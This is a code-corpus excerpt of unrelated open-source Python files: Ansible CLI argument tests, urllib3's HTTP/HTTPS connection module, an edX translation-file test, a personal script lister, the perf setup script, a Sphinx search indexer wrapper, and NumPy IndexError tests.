('start_at_task', u'Start with くらとみ')))
assert frozenset(co.CLIArgs(old_dict).items()) == expected
def test_cliargs():
class FakeOptions:
pass
options = FakeOptions()
options.tags = [u'production', u'webservers']
options.check_mode = True
options.start_at_task = u'Start with くらとみ'
expected = frozenset((('tags', (u'production', u'webservers')),
('check_mode', True),
('start_at_task', u'Start with くらとみ')))
assert frozenset(co.CLIArgs.from_options(options).items()) == expected
@pytest.mark.skipif(argparse is None, reason='argparse is not available')
def test_cliargs_argparse():
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
args = parser.parse_args([u'--sum', u'1', u'2'])
expected = frozenset((('accumulate', sum), ('integers', (1, 2))))
assert frozenset(co.CLIArgs.from_options(args).items()) == expected
# Can get rid of this test when we port ansible.cli from optparse to argparse
def test_cliargs_optparse():
parser = optparse.OptionParser(description='Process some integers.')
parser.add_option('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
opts, args = parser.parse_args([u'--sum', u'1', u'2'])
opts.integers = args
expected = frozenset((('accumulate', sum), ('integers', (u'1', u'2'))))
assert frozenset(co.CLIArgs.from_options(opts).items()) == expected
|
ryfeus/lambda-packs
|
refs/heads/master
|
Lxml_requests/source/requests/packages/urllib3/connection.py
|
64
|
from __future__ import absolute_import
import datetime
import logging
import os
import sys
import socket
from socket import error as SocketError, timeout as SocketTimeout
import warnings
from .packages import six
from .packages.six.moves.http_client import HTTPConnection as _HTTPConnection
from .packages.six.moves.http_client import HTTPException # noqa: F401
try: # Compiled with SSL?
import ssl
BaseSSLError = ssl.SSLError
except (ImportError, AttributeError): # Platform-specific: No SSL.
ssl = None
class BaseSSLError(BaseException):
pass
try: # Python 3:
# Not a no-op, we're adding this to the namespace so it can be imported.
ConnectionError = ConnectionError
except NameError: # Python 2:
class ConnectionError(Exception):
pass
from .exceptions import (
NewConnectionError,
ConnectTimeoutError,
SubjectAltNameWarning,
SystemTimeWarning,
)
from .packages.ssl_match_hostname import match_hostname, CertificateError
from .util.ssl_ import (
resolve_cert_reqs,
resolve_ssl_version,
assert_fingerprint,
create_urllib3_context,
ssl_wrap_socket
)
from .util import connection
from ._collections import HTTPHeaderDict
log = logging.getLogger(__name__)
port_by_scheme = {
'http': 80,
'https': 443,
}
RECENT_DATE = datetime.date(2014, 1, 1)
class DummyConnection(object):
"""Used to detect a failed ConnectionCls import."""
pass
class HTTPConnection(_HTTPConnection, object):
"""
Based on httplib.HTTPConnection but provides an extra constructor
backwards-compatibility layer between older and newer Pythons.
Additional keyword parameters are used to configure attributes of the connection.
Accepted parameters include:
- ``strict``: See the documentation on :class:`urllib3.connectionpool.HTTPConnectionPool`
- ``source_address``: Set the source address for the current connection.
.. note:: This is ignored for Python 2.6. It is only applied for 2.7 and 3.x
- ``socket_options``: Set specific options on the underlying socket. If not specified, then
defaults are loaded from ``HTTPConnection.default_socket_options`` which includes disabling
Nagle's algorithm (sets TCP_NODELAY to 1) unless the connection is behind a proxy.
For example, if you wish to enable TCP Keep Alive in addition to the defaults,
you might pass::
HTTPConnection.default_socket_options + [
(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),
]
Or you may want to disable the defaults by passing an empty list (e.g., ``[]``).
"""
default_port = port_by_scheme['http']
#: Disable Nagle's algorithm by default.
#: ``[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]``
default_socket_options = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]
#: Whether this connection verifies the host's certificate.
is_verified = False
def __init__(self, *args, **kw):
if six.PY3: # Python 3
kw.pop('strict', None)
# Pre-set source_address in case we have an older Python like 2.6.
self.source_address = kw.get('source_address')
if sys.version_info < (2, 7): # Python 2.6
# _HTTPConnection on Python 2.6 will balk at this keyword arg, but
# not newer versions. We can still use it when creating a
# connection though, so we pop it *after* we have saved it as
# self.source_address.
kw.pop('source_address', None)
#: The socket options provided by the user. If no options are
#: provided, we use the default options.
self.socket_options = kw.pop('socket_options', self.default_socket_options)
# Superclass also sets self.source_address in Python 2.7+.
_HTTPConnection.__init__(self, *args, **kw)
def _new_conn(self):
""" Establish a socket connection and set nodelay settings on it.
:return: New socket connection.
"""
extra_kw = {}
if self.source_address:
extra_kw['source_address'] = self.source_address
if self.socket_options:
extra_kw['socket_options'] = self.socket_options
try:
conn = connection.create_connection(
(self.host, self.port), self.timeout, **extra_kw)
except SocketTimeout as e:
raise ConnectTimeoutError(
self, "Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout))
except SocketError as e:
raise NewConnectionError(
self, "Failed to establish a new connection: %s" % e)
return conn
def _prepare_conn(self, conn):
self.sock = conn
# the _tunnel_host attribute was added in python 2.6.3 (via
# http://hg.python.org/cpython/rev/0f57b30a152f) so pythons 2.6(0-2) do
# not have them.
if getattr(self, '_tunnel_host', None):
# TODO: Fix tunnel so it doesn't depend on self.sock state.
self._tunnel()
# Mark this connection as not reusable
self.auto_open = 0
def connect(self):
conn = self._new_conn()
self._prepare_conn(conn)
def request_chunked(self, method, url, body=None, headers=None):
"""
Alternative to the common request method, which sends the
body with chunked encoding and not as one block
"""
headers = HTTPHeaderDict(headers if headers is not None else {})
skip_accept_encoding = 'accept-encoding' in headers
skip_host = 'host' in headers
self.putrequest(
method,
url,
skip_accept_encoding=skip_accept_encoding,
skip_host=skip_host
)
for header, value in headers.items():
self.putheader(header, value)
if 'transfer-encoding' not in headers:
self.putheader('Transfer-Encoding', 'chunked')
self.endheaders()
if body is not None:
stringish_types = six.string_types + (six.binary_type,)
if isinstance(body, stringish_types):
body = (body,)
for chunk in body:
if not chunk:
continue
if not isinstance(chunk, six.binary_type):
chunk = chunk.encode('utf8')
len_str = hex(len(chunk))[2:]
self.send(len_str.encode('utf-8'))
self.send(b'\r\n')
self.send(chunk)
self.send(b'\r\n')
# After the if clause, to always have a closed body
self.send(b'0\r\n\r\n')
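# Illustrative sketch (hypothetical host): streaming an iterable body with
# chunked transfer encoding via request_chunked().
#
#   conn = HTTPConnection('example.com', port=80)
#   conn.request_chunked('POST', '/upload', body=(b'part1', b'part2'))
#   response = conn.getresponse()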
class HTTPSConnection(HTTPConnection):
default_port = port_by_scheme['https']
ssl_version = None
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
ssl_context=None, **kw):
HTTPConnection.__init__(self, host, port, strict=strict,
timeout=timeout, **kw)
self.key_file = key_file
self.cert_file = cert_file
self.ssl_context = ssl_context
# Required property for Google AppEngine 1.9.0 which otherwise causes
# HTTPS requests to go out as HTTP. (See Issue #356)
self._protocol = 'https'
def connect(self):
conn = self._new_conn()
self._prepare_conn(conn)
if self.ssl_context is None:
self.ssl_context = create_urllib3_context(
ssl_version=resolve_ssl_version(None),
cert_reqs=resolve_cert_reqs(None),
)
self.sock = ssl_wrap_socket(
sock=conn,
keyfile=self.key_file,
certfile=self.cert_file,
ssl_context=self.ssl_context,
)
class VerifiedHTTPSConnection(HTTPSConnection):
"""
Based on httplib.HTTPSConnection but wraps the socket with
SSL certification.
"""
cert_reqs = None
ca_certs = None
ca_cert_dir = None
ssl_version = None
assert_fingerprint = None
def set_cert(self, key_file=None, cert_file=None,
cert_reqs=None, ca_certs=None,
assert_hostname=None, assert_fingerprint=None,
ca_cert_dir=None):
"""
This method should only be called once, before the connection is used.
"""
# If cert_reqs is not provided, we can try to guess. If the user gave
# us a cert database, we assume they want to use it: otherwise, if
# they gave us an SSL Context object we should use whatever is set for
# it.
if cert_reqs is None:
if ca_certs or ca_cert_dir:
cert_reqs = 'CERT_REQUIRED'
elif self.ssl_context is not None:
cert_reqs = self.ssl_context.verify_mode
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
self.ca_certs = ca_certs and os.path.expanduser(ca_certs)
self.ca_cert_dir = ca_cert_dir and os.path.expanduser(ca_cert_dir)
def connect(self):
# Add certificate verification
conn = self._new_conn()
hostname = self.host
if getattr(self, '_tunnel_host', None):
# _tunnel_host was added in Python 2.6.3
# (See: http://hg.python.org/cpython/rev/0f57b30a152f)
self.sock = conn
# Calls self._set_hostport(), so self.host is
# self._tunnel_host below.
self._tunnel()
# Mark this connection as not reusable
self.auto_open = 0
# Override the host with the one we're requesting data from.
hostname = self._tunnel_host
is_time_off = datetime.date.today() < RECENT_DATE
if is_time_off:
warnings.warn((
'System time is way off (before {0}). This will probably '
'lead to SSL verification errors').format(RECENT_DATE),
SystemTimeWarning
)
# Wrap socket using verification with the root certs in
# trusted_root_certs
if self.ssl_context is None:
self.ssl_context = create_urllib3_context(
ssl_version=resolve_ssl_version(self.ssl_version),
cert_reqs=resolve_cert_reqs(self.cert_reqs),
)
context = self.ssl_context
context.verify_mode = resolve_cert_reqs(self.cert_reqs)
self.sock = ssl_wrap_socket(
sock=conn,
keyfile=self.key_file,
certfile=self.cert_file,
ca_certs=self.ca_certs,
ca_cert_dir=self.ca_cert_dir,
server_hostname=hostname,
ssl_context=context)
if self.assert_fingerprint:
assert_fingerprint(self.sock.getpeercert(binary_form=True),
self.assert_fingerprint)
elif context.verify_mode != ssl.CERT_NONE \
and self.assert_hostname is not False:
cert = self.sock.getpeercert()
if not cert.get('subjectAltName', ()):
warnings.warn((
'Certificate for {0} has no `subjectAltName`, falling back to check for a '
'`commonName` for now. This feature is being removed by major browsers and '
'deprecated by RFC 2818. (See https://github.com/shazow/urllib3/issues/497 '
'for details.)'.format(hostname)),
SubjectAltNameWarning
)
_match_hostname(cert, self.assert_hostname or hostname)
self.is_verified = (
context.verify_mode == ssl.CERT_REQUIRED or
self.assert_fingerprint is not None
)
def _match_hostname(cert, asserted_hostname):
try:
match_hostname(cert, asserted_hostname)
except CertificateError as e:
log.error(
'Certificate did not match expected hostname: %s. '
'Certificate: %s', asserted_hostname, cert
)
# Add cert to exception and reraise so client code can inspect
# the cert when catching the exception, if they want to
e._peer_cert = cert
raise
if ssl:
# Make a copy for testing.
UnverifiedHTTPSConnection = HTTPSConnection
HTTPSConnection = VerifiedHTTPSConnection
else:
HTTPSConnection = DummyConnection
|
liuqr/edx-xiaodun
|
refs/heads/master
|
i18n/tests/test_compiled_messages.py
|
22
|
"""
Test that the compiled .mo files match the translations in the
uncompiled .po files.
This is required because we are checking in the .mo files into
the repo, but compiling them is a manual process. We want to make
sure that we find out if someone forgets the compilation step.
"""
import ddt
import polib
from unittest import TestCase
from i18n.config import CONFIGURATION, LOCALE_DIR
@ddt.ddt
class TestCompiledMessages(TestCase):
"""
Test that mo files match their source po files
"""
PO_FILES = ['django.po', 'djangojs.po']
@ddt.data(*CONFIGURATION.translated_locales)
def test_translated_messages(self, locale):
message_dir = LOCALE_DIR / locale / 'LC_MESSAGES'
for pofile_name in self.PO_FILES:
pofile_path = message_dir / pofile_name
pofile = polib.pofile(pofile_path)
mofile = polib.mofile(pofile_path.stripext() + '.mo')
po_entries = {entry.msgid: entry for entry in pofile.translated_entries()}
mo_entries = {entry.msgid: entry for entry in mofile.translated_entries()}
# Check that there are no entries in po that aren't in mo, and vice-versa
self.assertEquals(po_entries.viewkeys(), mo_entries.viewkeys())
for entry_id, po_entry in po_entries.iteritems():
mo_entry = mo_entries[entry_id]
for attr in ('msgstr', 'msgid_plural', 'msgstr_plural', 'msgctxt', 'obsolete', 'encoding'):
po_attr = getattr(po_entry, attr)
mo_attr = getattr(mo_entry, attr)
# The msgstr_plural in the mo_file is keyed on ints, but in the po_file it's
# keyed on strings. This normalizes them.
if attr == 'msgstr_plural':
po_attr = {int(key): val for (key, val) in po_attr.items()}
self.assertEquals(
po_attr,
mo_attr,
"When comparing {} for entry {!r}, {!r} from the .po file doesn't match {!r} from the .mo file".format(
attr,
entry_id,
po_attr,
mo_attr,
)
)
|
TomT0m/cmds
|
refs/heads/master
|
command/cmds.py
|
1
|
#! /usr/bin/python3
#encoding: utf-8
"""
#Description : a script that lists and shows the descriptions of other scripts
Scripts listed must follow this convention: a line beginning with # and matching 'Description( )?:(.*)'.
Other meta information includes:
"Group", if the command is a meta command, used similarly to a path.
"""
import os, sys
import os.path as path
import glob
from optparse import OptionParser
def matches_spec(scriptname):
""" Returns wether or not @scriptname
matches our scripts managemement conventions
"""
try:
with open(scriptname) as f:
for line in f:
if '#Description' in line:
return True
# if '#Group' in line:
# return True
except Exception:
return False
import re
def extract_pair(line):
    res = re.search(r'^#(\w+) *:(.*)$', line)
if res:
return [(res.group(1).strip(), res.group(2))]
return []
def read_datas(scriptname):
datas = {}
with open(scriptname) as f:
datas = {key: val for line in f
for (key, val) in
extract_pair(line) }
return datas
DIRECTORY = path.expanduser("~/bin")
class Script(object):
""" Storing infos about a script"""
def __init__(self, script, infos):
self.infos = infos
self.script = script
@property
def path(self):
return path.dirname(self.script)
@property
def name(self):
return path.basename(self.script)
@property
def description(self):
return self.infos["Description"]
@property
def is_meta(self):
return "Meta" in self.infos
def analyse_directory(bin_path):
os.chdir(bin_path)
    script_names = [script_path for script_path in glob.glob(path.join(bin_path, "*"))
                    if matches_spec(script_path)]
scripts = []
for script in script_names:
script = Script(script, read_datas(script))
scripts.append(script)
return scripts
def create_cl_parser():
parser = OptionParser()
parser.add_option("-c", "--complete", action = "store_true", default=False,
help = "to be used by bash autocomplete", dest = "complete")
parser.add_option("-m", "--list-meta", action = "store_true", default=False,
help = "list meta commands", dest = "complete_meta")
parser.add_option("-t", "--test", action = "store_true", default=False,
help = "Launches unit tests", dest = "tests")
parser.add_option("-f", "--forward", metavar="DIR", default=False,
help = "to set command directory to an arbitrary directory", dest = "forward")
return parser
import argparse
def create_argument_parser(description = None):
""" New version with argparse """
parser = argparse.ArgumentParser(description = description)
parser.add_argument("-c", "--complete", action = "store_true", default=False,
help = "to be used by bash autocomplete", dest = "complete")
parser.add_argument("-t", "--test", action = "store_true", default=False,
help = "Launches unit tests", dest = "tests")
return parser
import subprocess
def try_exec(directory, script_name, args):
command = [os.path.join(directory, script_name)]
command.extend(args)
cmd = subprocess.Popen(command, shell = False)
cmd.wait()
def command_in(command_str, command_list):
return command_str in [ command.name for command in command_list]
def main():
scripts = None
directory = DIRECTORY
scripts = analyse_directory(directory)
# do we get a real command ?
if len(sys.argv) >= 4 and command_in(sys.argv[3], analyse_directory(sys.argv[2])):
try_exec(sys.argv[2], sys.argv[3], sys.argv[4:])
exit(0)
parser = create_cl_parser()
(options, args) = parser.parse_args()
if options.forward :
directory = options.forward
scripts = analyse_directory(directory)
if options.complete :
print(" ".join( [script.name for script in scripts] ))
elif options.complete_meta:
print(" ".join( [script.name for script in scripts
if script.is_meta]))
elif len(scripts) > 0:
        taille = max(len(script.name) for script in scripts)
for script in scripts:
print(" {}: {} ".format(script.name.ljust(taille), script.description))
|
GalaxyTab4/android_kernel_samsung_s3ve3g
|
refs/heads/cm-13.0
|
tools/perf/util/setup.py
|
4998
|
#!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='acme@redhat.com',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
|
isu-enterprise/icc.cellula
|
refs/heads/master
|
src/icc/cellula/indexer/components.py
|
3
|
from icc.cellula.indexer.interfaces import IIndexer
from zope.interface import implementer, Interface
from zope.component import getUtility
import subprocess as sp
from icc.contentstorage import intdigest, hexdigest
import os.path, os, signal, sys  # sys is used below (sys.exec_prefix)
from icc.cellula.indexer.sphinxapi import *
from pkg_resources import resource_filename
import os
import os.path
import logging
logger=logging.getLogger('icc.cellula')
HOST='127.0.0.1'
PORT=9312
INDEX_NAME='annotations'
INDEX_TEMPLATE="""
source %(index_name)s_source
{
type = tsvpipe
tsvpipe_command = %(pipe_prog)s
tsvpipe_attr_string = hid
tsvpipe_field = body
%(indexer_fields)s
}
index %(index_name)s
{
source = %(index_name)s_source
path=%(dir)s/%(index_name)s
morphology=stem_enru
min_word_len = 3
}
indexer
{
	# maximum RAM usage limit for the indexer
mem_limit = 32M
}
searchd
{
listen = %(host)s:%(port)s
#listen = %(dir)s/searchd.sock
#listen = 9312
#listen = 127.0.0.1:9386:mysql41
# log file, searchd run info is logged here
# optional, default is 'searchd.log'
log = %(dir)s/searchd.log
# query log file, all search queries are logged here
# optional, default is empty (do not log queries)
query_log = %(dir)s/query.log
# client read timeout, seconds
# optional, default is 5
read_timeout = 5
# request timeout, seconds
# optional, default is 5 minutes
client_timeout = 300
# maximum amount of children to fork (concurrent searches to run)
# optional, default is 0 (unlimited)
max_children = 30
# maximum amount of persistent connections from this master to each agent host
# optional, but necessary if you use agent_persistent. It is reasonable to set the value
# as max_children, or less on the agent's hosts.
persistent_connections_limit = 30
# PID file, searchd process ID file name
# mandatory
pid_file = %(dir)s/searchd.pid
# seamless rotate, prevents rotate stalls if precaching huge datasets
# optional, default is 1
seamless_rotate = 1
# whether to forcibly preopen all indexes on startup
# optional, default is 1 (preopen everything)
preopen_indexes = 1
	# whether to unlink .old index copies on successful rotation.
# optional, default is 1 (do unlink)
unlink_old = 1
# attribute updates periodic flush timeout, seconds
# updates will be automatically dumped to disk this frequently
# optional, default is 0 (disable periodic flush)
#
# attr_flush_period = 900
# MVA updates pool size
# shared between all instances of searchd, disables attr flushes!
# optional, default size is 1M
mva_updates_pool = 1M
# max allowed network packet size
# limits both query packets from clients, and responses from agents
# optional, default size is 8M
max_packet_size = 8M
# max allowed per-query filter count
# optional, default is 256
max_filters = 256
# max allowed per-filter values count
# optional, default is 4096
max_filter_values = 4096
# socket listen queue length
# optional, default is 5
#
# listen_backlog = 5
# per-keyword read buffer size
# optional, default is 256K
#
# read_buffer = 256K
# unhinted read size (currently used when reading hits)
# optional, default is 32K
#
# read_unhinted = 32K
# max allowed per-batch query count (aka multi-query count)
# optional, default is 32
max_batch_queries = 32
# max common subtree document cache size, per-query
# optional, default is 0 (disable subtree optimization)
#
# subtree_docs_cache = 4M
# max common subtree hit cache size, per-query
# optional, default is 0 (disable subtree optimization)
#
# subtree_hits_cache = 8M
# multi-processing mode (MPM)
# known values are none, fork, prefork, and threads
# threads is required for RT backend to work
# optional, default is threads
workers = threads # for RT to work
# max threads to create for searching local parts of a distributed index
# optional, default is 0, which means disable multi-threaded searching
# should work with all MPMs (ie. does NOT require workers=threads)
#
# dist_threads = 4
# binlog files path; use empty string to disable binlog
# optional, default is build-time configured data directory
#
# binlog_path = # disable logging
binlog_path = %(dir)s # binlog.001 etc will be created there
# binlog flush/sync mode
# 0 means flush and sync every second
# 1 means flush and sync every transaction
# 2 means flush every transaction, sync every second
# optional, default is 2
#
# binlog_flush = 2
# binlog per-file size limit
# optional, default is 128M, 0 means no limit
#
# binlog_max_log_size = 256M
# per-thread stack size, only affects workers=threads mode
# optional, default is 64K
#
# thread_stack = 128K
# per-keyword expansion limit (for dict=keywords prefix searches)
# optional, default is 0 (no limit)
#
# expansion_limit = 1000
# RT RAM chunks flush period
# optional, default is 0 (no periodic flush)
#
# rt_flush_period = 900
# query log file format
# optional, known values are plain and sphinxql, default is plain
#
# query_log_format = sphinxql
# version string returned to MySQL network protocol clients
# optional, default is empty (use Sphinx version)
#
# mysql_version_string = 5.0.37
# default server-wide collation
# optional, default is libc_ci
#
# collation_server = utf8_general_ci
# server-wide locale for libc based collations
# optional, default is C
#
# collation_libc_locale = ru_RU.UTF-8
# threaded server watchdog (only used in workers=threads mode)
# optional, values are 0 and 1, default is 1 (watchdog on)
#
# watchdog = 1
# costs for max_predicted_time model, in (imaginary) nanoseconds
# optional, default is "doc=64, hit=48, skip=2048, match=64"
#
# predicted_time_costs = doc=64, hit=48, skip=2048, match=64
# current SphinxQL state (uservars etc) serialization path
# optional, default is none (do not serialize SphinxQL state)
#
# sphinxql_state = sphinxvars.sql
# maximum RT merge thread IO calls per second, and per-call IO size
# useful for throttling (the background) OPTIMIZE INDEX impact
# optional, default is 0 (unlimited)
#
# rt_merge_iops = 40
# rt_merge_maxiosize = 1M
# interval between agent mirror pings, in milliseconds
# 0 means disable pings
# optional, default is 1000
#
# ha_ping_interval = 0
# agent mirror statistics window size, in seconds
# stats older than the window size (karma) are retired
# that is, they will not affect master choice of agents in any way
# optional, default is 60 seconds
#
# ha_period_karma = 60
# delay between preforked children restarts on rotation, in milliseconds
# optional, default is 0 (no delay)
#
# prefork_rotation_throttle = 100
# a prefix to prepend to the local file names when creating snippets
# with load_files and/or load_files_scatter options
# optional, default is empty
#
# snippets_file_prefix = /mnt/common/server1/
}
#############################################################################
## common settings
#############################################################################
common
{
# lemmatizer dictionaries base path
	# optional, default is /usr/local/share (see ./configure --datadir)
#
# lemmatizer_base = /usr/local/share/sphinx/dicts
# how to handle syntax errors in JSON attributes
# known values are 'ignore_attr' and 'fail_index'
# optional, default is 'ignore_attr'
#
# on_json_attr_error = fail_index
# whether to auto-convert numeric values from strings in JSON attributes
# with auto-conversion, string value with actually numeric data
# (as in {"key":"12345"}) gets stored as a number, rather than string
# optional, allowed values are 0 and 1, default is 0 (do not convert)
#
# json_autoconv_numbers = 1
# whether and how to auto-convert key names in JSON attributes
# known value is 'lowercase'
# optional, default is unspecified (do nothing)
#
# json_autoconv_keynames = lowercase
# path to RLP root directory
	# optional, default is /usr/local/share (see ./configure --datadir)
#
# rlp_root = /usr/local/share/sphinx/rlp
# path to RLP environment file
	# optional, default is /usr/local/share/rlp-environment.xml (see ./configure --datadir)
#
# rlp_environment = /usr/local/share/sphinx/rlp/rlp/etc/rlp-environment.xml
# maximum total size of documents batched before processing them by the RLP
# optional, default is 51200
#
# rlp_max_batch_size = 100k
# maximum number of documents batched before processing them by the RLP
# optional, default is 50
#
# rlp_max_batch_docs = 100
# trusted plugin directory
# optional, default is empty (disable UDFs)
#
# plugin_dir = /usr/local/sphinx/lib
}
"""
@implementer(IIndexer)
class SphinxIndexer(object):
executable="sphinx-searchd"
indexer="sphinx-indexer"
def __init__(self):
"""Creates index service.
1. Generates a config in conf_dir;
2. Starts daemon tracking its pid pid_file;
3. Hopefully stops daemon on application exit.
"""
config=getUtility(Interface, "configuration")
ic=config['indexer']
data_dir = os.path.abspath(ic['data_dir'])
if not os.path.exists(data_dir):
os.makedirs(data_dir)
self.data_dir = data_dir
self.pid_file=os.path.join(self.data_dir, "searchd.pid")
self.conf_file=ic['conf_file']
self.batch_amount=int(ic.get('batch_amount', 200))
self.host=ic.get('host',HOST)
self.port=int(ic.get('port',PORT))
self.index_name=ic.get('index_name',INDEX_NAME)
self.execpathname=self.run(self.executable, executable='which').strip()
self.indexerpathname=self.run(self.indexer, executable='which').strip()
self.filepath_conf=None
self.started=False
self.index_proc=None
self.test()
self.create_config()
# self.reindex()
def test(self):
out=self.run('--help', executable=self.execpathname)
if not out.startswith("Sphinx"):
raise RuntimeError("cannot start Sphinx index server")
def run(self, *params, ignore_err=False, executable=None, par=False):
"""Run extract binary and capture its stdout.
If there is some stderr output, raise exception if
it is not igored (ignore_err).
"""
        if executable is None:
executable = self.execpathname
exec_bundle=[executable]+list(params)
logger.debug("EXEC: "+" ".join(exec_bundle))
if par:
cp=sp.Popen(exec_bundle, stdout=sp.PIPE, stderr=sp.PIPE)
return cp
else:
cp=sp.run(exec_bundle, stdout=sp.PIPE, stderr=sp.PIPE)
if cp.stderr and not ignore_err:
raise RuntimeError(cp.stderr.decode('utf-8').strip())
return cp.stdout.decode('utf-8')
def create_config(self):
"""Creates config file, controlling indexer.
"""
script_name=resource_filename("icc.cellula","indexer/scripts/indexfeeder.py")
me_python = os.path.join(sys.exec_prefix,"bin","python3")
feeder=me_python+" "+script_name
config=INDEX_TEMPLATE % {
"dir":self.data_dir,
"pipe_prog":feeder,
"indexer_fields":'',
'host':self.host,
'port':self.port,
'index_name':self.index_name,
}
self.filepath_conf = os.path.join(self.data_dir, self.conf_file)
of=open(self.filepath_conf, "w")
of.write(config)
of.close()
def start_daemon(self, times=3):
self.started=False
start=False
if times<=0:
logger.error("Could not start sphinx search daemon.")
return False
try:
pid=open(self.pid_file).read()
pid=int(pid)
except IOError:
start=True
except ValueError:
start=True
if not start:
try:
rc=os.kill(pid, signal.SIGHUP)
self.started=True
self.filepath_pid=self.pid_file
return True
except ProcessLookupError:
pass
self.reindex(par=False)
out=self.run('--config', self.filepath_conf)
self.start_daemon(times-1)
def connect(self):
cl=SphinxClient()
cl.SetServer(self.host, self.port)
cl.SetLimits(0, self.batch_amount, max(self.batch_amount, 1000))
return cl
@property
def pid(self):
return int(open(self.filepath_pid).read().strip())
def __del__(self):
if self.filepath_conf != None:
os.remove(self.filepath_conf)
#pid=self.pid()
self.run('--stopwait')
#os.remove(self.filename_pid)
def reindex(self, par=True, index=None):
# remove mark
self.index_delta(par=par, index=index)
def index_delta(self, par=True, index=None):
p=self.index_proc
if p != None and par:
logger.debug("Poll:" + str(p.poll()))
if not p.poll():
return False
else:
stderr=p.stderr.read().strip()
if len(stderr)>0:
logger.error("Indexer:" + stderr)
p=self.index_proc=self.run(
"--rotate",
"--quiet",
'--config', self.filepath_conf,
self.index_name,
executable=self.indexerpathname,
par=par
)
        # run() returns a Popen when par=True, so only check the captured
        # stdout string in the synchronous (par=False) case.
        if not par and p.strip():
            logger.error(p)
def search(self, query):
if not self.started:
self.start_daemon()
if not self.started:
raise RuntimeError("cannot start daemon")
cl=self.connect()
rc=cl.Query(query.encode('utf-8'), self.index_name)
if not rc:
raise RuntimeError('sphinx query failed:'+ cl.GetLastError())
warn=cl.GetLastWarning()
if warn:
logger.warning("Sphinx:" + warn)
return rc
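# Illustrative usage sketch (assumes the 'configuration' utility is registered
# with the component registry; the query text is a placeholder):
#
#   indexer = SphinxIndexer()
#   result = indexer.search(u'annotation text')
#   # `result` is the raw SphinxClient query result (matches, total, etc.).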
|
kaiserroll14/301finalproject
|
refs/heads/master
|
main/numpy/core/tests/test_indexerrors.py
|
145
|
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import TestCase, run_module_suite, assert_raises
class TestIndexErrors(TestCase):
'''Tests to exercise indexerrors not covered by other tests.'''
def test_arraytypes_fasttake(self):
'take from a 0-length dimension'
x = np.empty((2, 3, 0, 4))
assert_raises(IndexError, x.take, [0], axis=2)
assert_raises(IndexError, x.take, [1], axis=2)
assert_raises(IndexError, x.take, [0], axis=2, mode='wrap')
assert_raises(IndexError, x.take, [0], axis=2, mode='clip')
def test_take_from_object(self):
# Check exception taking from object array
d = np.zeros(5, dtype=object)
assert_raises(IndexError, d.take, [6])
# Check exception taking from 0-d array
d = np.zeros((5, 0), dtype=object)
assert_raises(IndexError, d.take, [1], axis=1)
assert_raises(IndexError, d.take, [0], axis=1)
assert_raises(IndexError, d.take, [0])
assert_raises(IndexError, d.take, [0], mode='wrap')
assert_raises(IndexError, d.take, [0], mode='clip')
def test_multiindex_exceptions(self):
a = np.empty(5, dtype=object)
assert_raises(IndexError, a.item, 20)
a = np.empty((5, 0), dtype=object)
assert_raises(IndexError, a.item, (0, 0))
a = np.empty(5, dtype=object)
assert_raises(IndexError, a.itemset, 20, 0)
a = np.empty((5, 0), dtype=object)
assert_raises(IndexError, a.itemset, (0, 0), 0)
def test_put_exceptions(self):
a = np.zeros((5, 5))
assert_raises(IndexError, a.put, 100, 0)
a = np.zeros((5, 5), dtype=object)
assert_raises(IndexError, a.put, 100, 0)
a = np.zeros((5, 5, 0))
assert_raises(IndexError, a.put, 100, 0)
a = np.zeros((5, 5, 0), dtype=object)
assert_raises(IndexError, a.put, 100, 0)
def test_iterators_exceptions(self):
"cases in iterators.c"
def assign(obj, ind, val):
obj[ind] = val
a = np.zeros([1, 2, 3])
assert_raises(IndexError, lambda: a[0, 5, None, 2])
assert_raises(IndexError, lambda: a[0, 5, 0, 2])
assert_raises(IndexError, lambda: assign(a, (0, 5, None, 2), 1))
assert_raises(IndexError, lambda: assign(a, (0, 5, 0, 2), 1))
a = np.zeros([1, 0, 3])
assert_raises(IndexError, lambda: a[0, 0, None, 2])
assert_raises(IndexError, lambda: assign(a, (0, 0, None, 2), 1))
a = np.zeros([1, 2, 3])
assert_raises(IndexError, lambda: a.flat[10])
assert_raises(IndexError, lambda: assign(a.flat, 10, 5))
a = np.zeros([1, 0, 3])
assert_raises(IndexError, lambda: a.flat[10])
assert_raises(IndexError, lambda: assign(a.flat, 10, 5))
a = np.zeros([1, 2, 3])
assert_raises(IndexError, lambda: a.flat[np.array(10)])
assert_raises(IndexError, lambda: assign(a.flat, np.array(10), 5))
a = np.zeros([1, 0, 3])
assert_raises(IndexError, lambda: a.flat[np.array(10)])
assert_raises(IndexError, lambda: assign(a.flat, np.array(10), 5))
a = np.zeros([1, 2, 3])
assert_raises(IndexError, lambda: a.flat[np.array([10])])
assert_raises(IndexError, lambda: assign(a.flat, np.array([10]), 5))
